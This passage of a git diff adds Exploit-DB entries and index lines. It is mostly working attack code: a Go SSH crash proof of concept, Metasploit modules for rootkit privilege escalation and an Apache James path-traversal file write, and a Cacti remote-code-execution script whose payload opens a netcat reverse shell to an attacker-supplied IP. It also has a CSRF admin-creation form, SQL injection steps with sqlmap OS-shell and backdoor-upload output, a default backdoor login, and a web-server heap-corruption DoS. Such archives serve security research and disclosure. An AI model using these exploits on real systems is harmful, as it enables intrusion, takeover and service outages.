leads to bypass of this security + control. + +Remediated Product Version: +ManageEngine EventLog Analyzer Build 12110 + +Reference: +https://www.manageengine.com/products/eventlog/ +https://www.manageengine.com/products/eventlog/features-new.html#release +https://gist.github.com/scottgoodwin90/19ccecdc9f5733c0a9381765cfc7fe39 +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19774 +https://ocd-tech.com \ No newline at end of file diff --git a/exploits/linux/dos/48121.py b/exploits/linux/dos/48121.py new file mode 100755 index 000000000..3c2f74592 --- /dev/null +++ b/exploits/linux/dos/48121.py @@ -0,0 +1,61 @@ +# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC) +# Author: Mark Adams +# Date: 2020-02-21 +# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py +# CVE: CVE-2020-9283 +# +# Running this script may crash the remote SSH server if it is vulnerable. +# The GitHub repository contains a vulnerable and fixed SSH server for testing. +# +# $ python poc.py +# ./poc.py +# +# $ python poc.py localhost 2022 root +# Malformed auth request sent. This should cause a panic on the remote server. +# + +#!/usr/bin/env python + +import socket +import sys + +import paramiko +from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST + +if len(sys.argv) != 4: + print('./poc.py ') + sys.exit(1) + +host = sys.argv[1] +port = int(sys.argv[2]) +user = sys.argv[3] + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect((host, port)) + +t = paramiko.Transport(sock) +t.start_client() + +t.lock.acquire() +m = paramiko.Message() +m.add_byte(cMSG_SERVICE_REQUEST) +m.add_string("ssh-userauth") +t._send_message(m) + +m = paramiko.Message() +m.add_byte(cMSG_USERAUTH_REQUEST) +m.add_string(user) +m.add_string("ssh-connection") +m.add_string('publickey') +m.add_boolean(True) +m.add_string('ssh-ed25519') + +# Send an SSH key that is too short (ed25519 keys are 32 bytes) +m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x15key-that-is-too-short') + +# Send an empty signature (the server won't get far enough to validate it) +m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x00') + +t._send_message(m) + +print('Malformed auth request sent. This should cause a panic on the remote server.') \ No newline at end of file diff --git a/exploits/linux/local/48131.rb b/exploits/linux/local/48131.rb new file mode 100755 index 000000000..15f0e22cb --- /dev/null +++ b/exploits/linux/local/48131.rb @@ -0,0 +1,115 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Diamorphine Rootkit Signal Privilege Escalation', + 'Description' => %q{ + This module uses Diamorphine rootkit's privesc feature using signal + 64 to elevate the privileges of arbitrary processes to UID 0 (root). + + This module has been tested successfully with Diamorphine from `master` + branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'm0nad', # Diamorphine + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2013-11-07', # Diamorphine first public commit + 'References' => + [ + ['URL', 'https://github.com/m0nad/Diamorphine'] + ], + 'Platform' => ['linux'], + 'Arch' => [ARCH_X86, ARCH_X64], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'Notes' => + { + 'Reliability' => [ REPEATABLE_SESSION ], + 'Stability' => [ CRASH_SAFE ] + }, + 'DefaultTarget' => 0)) + register_options [ + OptInt.new('SIGNAL', [true, 'Diamorphine elevate signal', 64]) + ] + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def signal + datastore['SIGNAL'].to_s + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload_and_chmodx(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + write_file path, data + chmod path, 0755 + end + + def cmd_exec_elevated(cmd) + vprint_status "Executing #{cmd} ..." + res = cmd_exec("sh -c 'kill -#{signal} $$ && #{cmd}'").to_s + vprint_line res unless res.blank? + res + end + + def check + res = cmd_exec_elevated 'id' + + if res.include?('invalid signal') + return CheckCode::Safe("Signal '#{signal}' is invalid") + end + + unless res.include?('uid=0') + return CheckCode::Safe("Diamorphine is not installed, or incorrect signal '#{signal}'") + end + + CheckCode::Vulnerable("Diamorphine is installed and configured to handle signal '#{signal}'.") + end + + def exploit + unless check == CheckCode::Vulnerable + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + payload_name = ".#{rand_text_alphanumeric 8..12}" + payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + register_file_for_cleanup payload_path + + cmd_exec_elevated "#{payload_path} & echo " + end +end \ No newline at end of file diff --git a/exploits/linux/remote/48130.rb b/exploits/linux/remote/48130.rb new file mode 100755 index 000000000..71e4c3c92 --- /dev/null +++ b/exploits/linux/remote/48130.rb @@ -0,0 +1,198 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStager + + def initialize(info={}) + super(update_info(info, + 'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write", + 'Description' => %q{ + This module exploits a vulnerability that exists due to a lack of input + validation when creating a user. Messages for a given user are stored + in a directory partially defined by the username. By creating a user + with a directory traversal payload as the username, commands can be + written to a given directory. To use this module with the cron + exploitation method, run the exploit using the given payload, host, and + port. After running the exploit, the payload will be executed within 60 + seconds. Due to differences in how cron may run in certain Linux + operating systems such as Ubuntu, it may be preferable to set the + target to Bash Completion as the cron method may not work. If the target + is set to Bash completion, start a listener using the given payload, + host, and port before running the exploit. After running the exploit, + the payload will be executed when a user logs into the system. For this + exploitation method, bash completion must be enabled to gain code + execution. This exploitation method will leave an Apache James mail + object artifact in the /etc/bash_completion.d directory and the + malicious user account. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Palaczynski Jakub', # Discovery + 'Matthew Aberegg', # Metasploit + 'Michael Burkey' # Metasploit + ], + 'References' => + [ + [ 'CVE', '2015-7611' ], + [ 'EDB', '35513' ], + [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ] + ], + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Targets' => + [ + [ 'Bash Completion', { + 'ExploitPath' => 'bash_completion.d', + 'ExploitPrepend' => '', + 'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 } + } ], + [ 'Cron', { + 'ExploitPath' => 'cron.d', + 'ExploitPrepend' => '* * * * * root ', + 'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 } + } ] + ], + 'Privileged' => true, + 'DisclosureDate' => "Oct 1 2015", + 'DefaultTarget' => 1, + 'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ] + )) + register_options( + [ + OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]), + OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]), + OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]), + OptString.new('POP3PORT', [false, 'Port for POP3 Apache James Service', '110' ]), + Opt::RPORT(25) + ]) + import_target_defaults + end + + def check + # SMTP service check + connect + smtp_banner = sock.get_once + disconnect + unless smtp_banner.to_s.include? "JAMES SMTP Server" + return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server") + end + + # James Remote Administration Tool service check + connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']}) + admin_banner = sock.get_once + disconnect + unless admin_banner.to_s.include? "JAMES Remote Administration Tool" + return CheckCode::Safe("Target is not JAMES Remote Administration Tool") + end + + # Get version number + version = admin_banner.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first + # Null check + unless version + return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version") + end + # Create version objects + target_version = Gem::Version.new(version) + vulnerable_version = Gem::Version.new("2.3.2") + + # Check version number + if target_version > vulnerable_version + return CheckCode::Safe + elsif target_version == vulnerable_version + return CheckCode::Appears + elsif target_version < vulnerable_version + return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable") + end + end + + def execute_james_admin_tool_command(cmd) + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']}) + sock.get_once + sock.puts(username + "\n") + sock.get_once + sock.puts(password + "\n") + sock.get_once + sock.puts(cmd) + sock.get_once + sock.puts("quit\n") + disconnect + end + + def cleanup + return unless target['ExploitPath'] == "cron.d" + # Delete mail objects containing payload from cron.d + username = "../../../../../../../../etc/cron.d" + password = @account_password + begin + connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']}) + sock.get_once + sock.puts("USER #{username}\r\n") + sock.get_once + sock.puts("PASS #{password}\r\n") + sock.get_once + sock.puts("dele 1\r\n") + sock.get_once + sock.puts("quit\r\n") + disconnect + rescue + print_bad("Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password '#{@account_password}'") + end + + # Delete malicious user + delete_user_command = "deluser ../../../../../../../../etc/cron.d\n" + execute_james_admin_tool_command(delete_user_command) + end + + def execute_command(cmd, opts = {}) + # Create malicious user with randomized password (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d) + exploit_path = target['ExploitPath'] + @account_password = Rex::Text.rand_text_alpha(8..12) + add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@account_password}\n" + execute_james_admin_tool_command(add_user_command) + + # Send payload via SMTP + payload_prepend = target['ExploitPrepend'] + connect + sock.puts("ehlo admin@apache.com\r\n") + sock.get_once + sock.puts("mail from: <'@apache.com>\r\n") + sock.get_once + sock.puts("rcpt to: <../../../../../../../../etc/#{exploit_path}>\r\n") + sock.get_once + sock.puts("data\r\n") + sock.get_once + sock.puts("From: admin@apache.com\r\n") + sock.puts("\r\n") + sock.puts("'\n") + sock.puts("#{payload_prepend}#{cmd}\n") + sock.puts("\r\n.\r\n") + sock.get_once + sock.puts("quit\r\n") + sock.get_once + disconnect + end + + def execute_cmdstager_end(opts) + if target['ExploitPath'] == "cron.d" + print_status("Waiting for cron to execute payload...") + else + print_status("Payload will be triggered when someone logs onto the target") + print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'") + print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.") + end + end + + def exploit + execute_cmdstager(background: true) + end + +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48108.txt b/exploits/multiple/webapps/48108.txt new file mode 100644 index 000000000..56a6051ca --- /dev/null +++ b/exploits/multiple/webapps/48108.txt @@ -0,0 +1 @@ +1 \ No newline at end of file diff --git a/exploits/php/webapps/48109.txt b/exploits/php/webapps/48109.txt new file mode 100644 index 000000000..148db2beb --- /dev/null +++ b/exploits/php/webapps/48109.txt @@ -0,0 +1,21 @@ +# Title : AMSS++ v 4.31 - 'id' SQL Injection +# Author : indoushka +# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) +# Vendor: http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar +# Dork: แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++" +# CVE: N/A + +# poc : + +[+] Dorking İn Google Or Other Search Enggine. + +[+] Use payload : /modules/mail/main/maildetail.php?id=174 + +[+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here + + +Greetings to :========================================================================================================================= + | +jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | + | +======================================================================================================================================= \ No newline at end of file diff --git a/exploits/php/webapps/48113.txt b/exploits/php/webapps/48113.txt new file mode 100644 index 000000000..8443e103a --- /dev/null +++ b/exploits/php/webapps/48113.txt @@ -0,0 +1,29 @@ +# Title: CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-02-21 +# Exploit Author: J3rryBl4nks +# Vendor Homepage: https://sourceforge.net/u/auieo/profile/ +# Software Link: https://sourceforge.net/projects/candidats/files/#Version 2.1.0 +# Tested on Ubuntu 19/Kali Rolling + +# The Candid ATS Web application is vulnerable to CSRF to add a new admin user: +#CSRF Proof of Concept: + + + + +
+ + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/48114.txt b/exploits/php/webapps/48114.txt new file mode 100644 index 000000000..4ae5f0111 --- /dev/null +++ b/exploits/php/webapps/48114.txt @@ -0,0 +1,23 @@ +# Title: AMSS++ 4.7 - Backdoor Admin Account +# Author: indoushka +# Date: 2020-02-23 +# Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) +# Vendor : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar +# Dork : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++" +==================================================================================================================================== + +poc : + + +[+] Dorking İn Google Or Other Search Enggine. + +[+] Use Login : admin & 1234 + +[+] http://127.0.0.1/innoobec/index.php + + +Greetings to :========================================================================================================================= + | +jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | + | +======================================================================================================================================= \ No newline at end of file diff --git a/exploits/php/webapps/48117.txt b/exploits/php/webapps/48117.txt new file mode 100644 index 000000000..92ad9ca8c --- /dev/null +++ b/exploits/php/webapps/48117.txt @@ -0,0 +1,16 @@ +# Exploit Title: ATutor 2.2.4 - 'id' SQL Injection +# Date: 2020-02-23 +# Exploit Author: Andrey Stoykov +# Vendor Homepage: https://atutor.github.io/ +# Software Link: https://sourceforge.net/projects/atutor/files/latest/download +# Version: ATutor 2.2.4 +# Tested on: LAMP on Ubuntu 18.04 + +Steps to Reproduce: + +1) Login as admin user +2) Browse to the following URL: +http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17' +3) Exploiting with SQLMAP: +//Must supply valid User-Agent otherwise, there will be errors. +sqlmap --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --dbms=mysql -u "http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17*" --cookie= \ No newline at end of file diff --git a/exploits/php/webapps/48122.txt b/exploits/php/webapps/48122.txt new file mode 100644 index 000000000..b95711492 --- /dev/null +++ b/exploits/php/webapps/48122.txt @@ -0,0 +1,61 @@ +# Title: eLection 2.0 - 'id' SQL Injection +# Date: 2020-02-21 +# Exploit Author: J3rryBl4nks +# Vendor Homepage: https://sourceforge.net/projects/election-by-tripath/ +# Software Link: https://sourceforge.net/projects/election-by-tripath/files/#Version 2.0 +# Tested on Ubuntu 19/Kali Rolling + +# The eLection Web application is vulnerable to authenticated SQL Injection which leads to remote code execution: +# Login to the admin portal and browse to the candidates section. Capture the request in BurpSuite and save it to file: + +POST /election/admin/ajax/op_kandidat.php HTTP/1.1 +Host: HOSTNAME +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://HOSTNAME/election/admin/kandidat.php?_ +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 17 +Connection: close +Cookie: el_listing_panitia=5; el_mass_adding=false; el_listing_guru=5; el_listing_siswa=5; PHPSESSID=b4f0c3bbccd80e9d55fbe0269a29f96a; el_lang=en-us + +aksi=fetch&id=256 + + + +Send the request to SQLMap with the following parameters: + + sqlmap -r getcandidate --level=5 --risk=3 --os-shell -p id + + +SQLMap will find the injection: + + --- + Parameter: id (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: aksi=fetch&id=256 AND 8584=8584 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: aksi=fetch&id=256 AND (SELECT 8551 FROM (SELECT(SLEEP(5)))nYfJ) + + Type: UNION query + Title: Generic UNION query (NULL) - 5 columns + Payload: aksi=fetch&id=-9798 UNION ALL SELECT NULL,NULL,CONCAT(0x7170707171,0x676d755461434e486f49475051707357694861534e664f416f434269487042545a76454f5843584b,0x71717a7871),NULL,NULL-- dWMc + --- + + + [09:39:07] [WARNING] unable to automatically parse any web server path + [09:39:07] [INFO] trying to upload the file stager on '/opt/lampp/htdocs/election/' via LIMIT 'LINES TERMINATED BY' method + [09:39:07] [INFO] the file stager has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpumlfm.php + [09:39:07] [INFO] the backdoor has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpbpfkq.php + [09:39:07] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER + os-shell> + + +Due to the way the setup of the application requires you to change permissions on the directory of the web app, you should be able to get a shell. + +https://github.com/J3rryBl4nks/eLection-TriPath-/blob/master/SQLiIntoRCE.md \ No newline at end of file diff --git a/exploits/php/webapps/48128.py b/exploits/php/webapps/48128.py new file mode 100755 index 000000000..0fccb05fa --- /dev/null +++ b/exploits/php/webapps/48128.py @@ -0,0 +1,102 @@ +# Exploit Title: Cacti 1.2.8 - Remote Code Execution +# Date: 2020-02-03 +# Exploit Author: Askar (@mohammadaskar2) +# CVE: CVE-2020-8813 +# Vendor Homepage: https://cacti.net/ +# Version: v1.2.8 +# Tested on: CentOS 7.3 / PHP 7.1.33 + +#!/usr/bin/python3 + +import requests +import sys +import warnings +from bs4 import BeautifulSoup +from urllib.parse import quote + +warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') + + +if len(sys.argv) !=3D 6: + print("[~] Usage : ./Cacti-exploit.py url username password ip port") + exit() + +url =3D sys.argv[1] +username =3D sys.argv[2] +password =3D sys.argv[3] +ip =3D sys.argv[4] +port =3D sys.argv[5] + +def login(token): + login_info =3D { + "login_username": username, + "login_password": password, + "action": "login", + "__csrf_magic": token + } + login_request =3D request.post(url+"/index.php", login_info) + login_text =3D login_request.text + if "Invalid User Name/Password Please Retype" in login_text: + return False + else: + return True + +def enable_guest(token): + request_info =3D { + "id": "3", + "section25": "on", + "section7": "on", + "tab": "realms", + "save_component_realm_perms": 1, + "action": "save", + "__csrf_magic": token + } + enable_request =3D request.post(url+"/user_admin.php?header=3Dfalse", r= +equest_info) + if enable_request: + return True + else: + return False + +def send_exploit(): + payload =3D ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port) + cookies =3D {'Cacti': quote(payload)} + requests.get(url+"/graph_realtime.php?action=3Dinit", cookies=3Dcookies= +) + +request =3D requests.session() +print("[+]Retrieving login CSRF token") +page =3D request.get(url+"/index.php") +html_content =3D page.text +soup =3D BeautifulSoup(html_content, "html5lib") +token =3D soup.findAll('input')[0].get("value") +if token: + print("[+]Token Found : %s" % token) + print("[+]Sending creds ..") + login_status =3D login(token) + if login_status: + print("[+]Successfully LoggedIn") + print("[+]Retrieving CSRF token ..") + page =3D request.get(url+"/user_admin.php?action=3Duser_edit&id=3D3= +&tab=3Drealms") + html_content =3D page.text + soup =3D BeautifulSoup(html_content, "html5lib") + token =3D soup.findAll('input')[1].get("value") + if token: + print("[+]Making some noise ..") + guest_realtime =3D enable_guest(token) + if guest_realtime: + print("[+]Sending malicous request, check your nc ;)") + send_exploit() + else: + print("[-]Error while activating the malicous account") + + else: + print("[-] Unable to retrieve CSRF token from admin page!") + exit() + + else: + print("[-]Cannot Login!") +else: + print("[-] Unable to retrieve CSRF token!") + exit() \ No newline at end of file diff --git a/exploits/windows/dos/48111.py b/exploits/windows/dos/48111.py new file mode 100755 index 000000000..59751311c --- /dev/null +++ b/exploits/windows/dos/48111.py @@ -0,0 +1,89 @@ +# Title: Quick N Easy Web Server 3.3.8 - Denial of Service (PoC) +# Date: 2019-12-25 +# Author: Cody Winkler +# Vendor Homepage: https://www.pablosoftwaresolutions.com/ +# Software Link: https://www.pablosoftwaresolutions.com/html/quick__n_easy_web_server.html +# Version: <= 3.3.8 +# Tested on: Windows 10 x64 (wow64) +# CVE: N/A + +#!/usr/bin/env python +""" +Remote Unauthenticated Heap Memory Corruption in Quick N' Easy Web Server <= 3.3.8 + +[+] Usage: python quickwww_heap338.py + +$ python exploit.py 127.0.0.1 80 +""" + +from __future__ import print_function +import socket +import sys +import re + +host = sys.argv[1] +port = int(sys.argv[2]) + +crashed = r'(503 Service Unavailable)' + +http_req = "GET / HTTP/1.1\r\n" +http_req += "Host: " + "A"*15000 + "\r\n" # 50000 A's causes an interesting double free in OLEAUT32!VariantClear() when attached to debugger +http_req += "User-Agent: A\r\n" +http_req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +http_req += "Accept-Language: en-US,en;q=0.5\r\n" +http_req += "Cookie: A\r\n" +http_req += "Connection: Close\r\n" +http_req += "Upgrade-Insecure-Requests: 0\r\n" +http_req += "Cache-control: max-age=0\r\n\r\n" + +def main(): + + print("[+] Remote Heap Memory Corruption in Quick n Easy Web Server <= 3.3.8") + i = 1 + while( i < 1500): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.send(http_req) + print("[+] Spraying heap with %d 5000-byte requests" % i, end='\r') + sys.stdout.flush() + if re.search(crashed, s.recv(1024)): + print(" "*50) + print("[+] Threads have exited BAADF00D with %d requests!" % i) + s.close() + exit() + s.close() + i = i+1 + except Exception, msg: + print("[-] Something went wrong :(") + print(msg) + +main() + +""" +0:010> kb7 + # ChildEBP RetAddr Args to Child +00 06bbf4d4 77ebc1f5 77df50e4 8ae27015 01471640 ntdll!RtlpValidateHeapEntry+0x61114 +01 06bbf51c 77e6b325 06bc0048 01471640 772e0f80 ntdll!RtlDebugSizeHeap+0xb3 +02 06bbf53c 772e0f9b 013b0000 00000000 06bc0048 ntdll!RtlSizeHeap+0x45775 +03 06bbf550 76640be7 773fcf44 06bc0048 00000008 combase!CRetailMalloc_GetSize+0x1b [onecore\com\combase\class\memapi.cxx @ 702] +04 06bbf574 766408cd 06bc0048 01471760 00451f4c OLEAUT32!APP_DATA::FreeCachedMem+0x37 +05 06bbf5a8 0041ec27 06bbf5bc 05ec4fe4 05ec4f50 OLEAUT32!VariantClear+0x20d +WARNING: Stack unwind information not available. Following frames may be wrong. +06 06bbf5c4 766408cd 76cd0008 0907a724 01471254 quickweb+0x1ec27 + +0:010> !analyze -v + +STACK_TEXT: +00000000 00000000 heap_corruption!quickweb.exe+0x0 +SYMBOL_NAME: heap_corruption!quickweb.exe +MODULE_NAME: heap_corruption +IMAGE_NAME: heap_corruption +STACK_COMMAND: ** Pseudo Context ** ManagedPseudo ** Value: 7ba5870 ** ; kb +FAILURE_BUCKET_ID: HEAP_CORRUPTION_80000003_heap_corruption!quickweb.exe +OS_VERSION: 10.0.17763.1 +BUILDLAB_STR: rs5_release +OSPLATFORM_TYPE: x86 +OSNAME: Windows 10 +FAILURE_ID_HASH: {68efeb37-77bb-f968-fc16-9a1fba88436f} +""" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e6dc7ab1f..8d4b7d2cb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6679,6 +6679,8 @@ id,file,description,date,author,type,platform,port 48034,exploits/linux/dos/48034.py,"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init",2020-02-10,"Google Security Research",dos,linux, 48035,exploits/multiple/dos/48035.txt,"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()",2020-02-10,"Google Security Research",dos,multiple, 48100,exploits/windows/dos/48100.py,"Core FTP Lite 1.3 - Denial of Service (PoC)",2020-02-20,"berat isler",dos,windows, +48111,exploits/windows/dos/48111.py,"Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)",2020-02-24,"Cody Winkler",dos,windows, +48121,exploits/linux/dos/48121.py,"Go SSH servers 0.0.2 - Denial of Service (PoC)",2020-02-24,"Mark Adams",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10970,6 +10972,8 @@ id,file,description,date,author,type,platform,port 48080,exploits/windows/local/48080.txt,"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows, 48085,exploits/windows/local/48085.txt,"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows, 48087,exploits/windows/local/48087.py,"Cuckoo Clock v5.0 - Buffer Overflow",2020-02-17,boku,local,windows, +48129,exploits/android/local/48129.rb,"Android Binder - Use-After-Free (Metasploit)",2020-02-24,Metasploit,local,android, +48131,exploits/linux/local/48131.rb,"Diamorphine Rootkit - Signal Privilege Escalation (Metasploit)",2020-02-24,Metasploit,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18007,6 +18011,7 @@ id,file,description,date,author,type,platform,port 48051,exploits/openbsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,openbsd, 48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows, 48092,exploits/windows/remote/48092.rb,"Anviz CrossChex - Buffer Overflow (Metasploit)",2020-02-17,Metasploit,remote,windows, +48130,exploits/linux/remote/48130.rb,"Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)",2020-02-24,Metasploit,remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42378,3 +42383,19 @@ id,file,description,date,author,type,platform,port 48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware, 48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware, 48099,exploits/php/webapps/48099.txt,"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)",2020-02-20,indoushka,webapps,php, +48105,exploits/hardware/webapps/48105.txt,"Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting",2020-02-24,"Scott Goodwin",webapps,hardware, +48107,exploits/hardware/webapps/48107.pl,"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware, +48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple, +48109,exploits/php/webapps/48109.txt,"AMSS++ v 4.31 - 'id' SQL Injection",2020-02-24,indoushka,webapps,php, +48110,exploits/hardware/webapps/48110.txt,"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware, +48113,exploits/php/webapps/48113.txt,"CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)",2020-02-24,J3rryBl4nks,webapps,php, +48114,exploits/php/webapps/48114.txt,"AMSS++ 4.7 - Backdoor Admin Account",2020-02-24,indoushka,webapps,php, +48115,exploits/hardware/webapps/48115.pl,"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware, +48117,exploits/php/webapps/48117.txt,"ATutor 2.2.4 - 'id' SQL Injection",2020-02-24,"Andrey Stoykov",webapps,php, +48118,exploits/hardware/webapps/48118.txt,"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware, +48119,exploits/java/webapps/48119.txt,"ManageEngine EventLog Analyzer 10.0 - Information Disclosure",2020-02-24,"Scott Goodwin",webapps,java, +48122,exploits/php/webapps/48122.txt,"eLection 2.0 - 'id' SQL Injection",2020-02-24,J3rryBl4nks,webapps,php, 